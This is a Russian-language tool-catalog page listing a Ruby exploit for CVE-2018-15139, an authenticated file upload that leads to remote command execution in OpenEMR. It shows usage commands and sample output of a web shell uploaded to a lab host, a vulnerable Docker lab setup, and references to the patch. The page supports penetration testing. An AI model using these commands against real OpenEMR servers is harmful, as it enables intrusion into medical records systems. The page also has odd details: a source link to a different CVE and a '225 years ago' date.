Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/sec-it/exploit-cve-2018-15139
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubsec-it/exploit-cve-2018-15139

exploit-CVE-2018-15139

OpenEMR < 5.0.1.4 - (Аутентифицированная) загрузка файла - удалённое выполнение команд

Репозиторий
225 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт OpenEMR CVE-2018-15139

OpenEMR < 5.0.1.4 - (Аутентифицированная) загрузка файла - удалённое выполнение команд

Эксплойт для CVE-2018-15139.

Использование

root@kitploit:~
$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution

Source: https://github.com/sec-it/exploit-CVE-2019-14530

Usage:
  exploit.rb exploit <url> <filename> <username> <password> [--debug]
  exploit.rb -h | --help

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <filename>  Filename of the shell to be uploaded
  <username>  Username of the admin
  <password>  Password of the admin
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb exploit http://example.org/openemr shell.php admin pass
  exploit.rb exploit https://example.org:5000/ shell.php admin pass

Пример

root@kitploit:~
$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php

Требования

  • httpx
  • docopt.rb

Пример использования gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

Развёртывание уязвимого ПО в Docker

Предупреждение: разумеется, такая настройка не подходит для использования в производственной среде!

root@kitploit:~
$ sudo docker-compose up

В официальном Docker-образе OpenEMR нарушены права доступа к папке загрузки, поэтому необходимо подключиться к контейнеру и исправить права, например:

root@kitploit:~
$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/

Ссылки

  • Целевое ПО: OpenEMR
    • Домашняя страница: https://www.open-emr.org/
    • Исходный код: https://github.com/openemr/openemr
    • Docker: см. docker-compose.yml
    • Уязвимая версия: < 5.0.1.4 (то есть до 5.0.1.3 включительно)
    • Патч: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485

Это улучшенная переработка EDB-49998.

Уязвимость была обнаружена Project Insecurity.

Анализ оригинального эксплойта и уязвимости:

  • OpenEMR исправляет серьёзные уязвимости, обнаруженные Project Insecurity
Скачать инструмент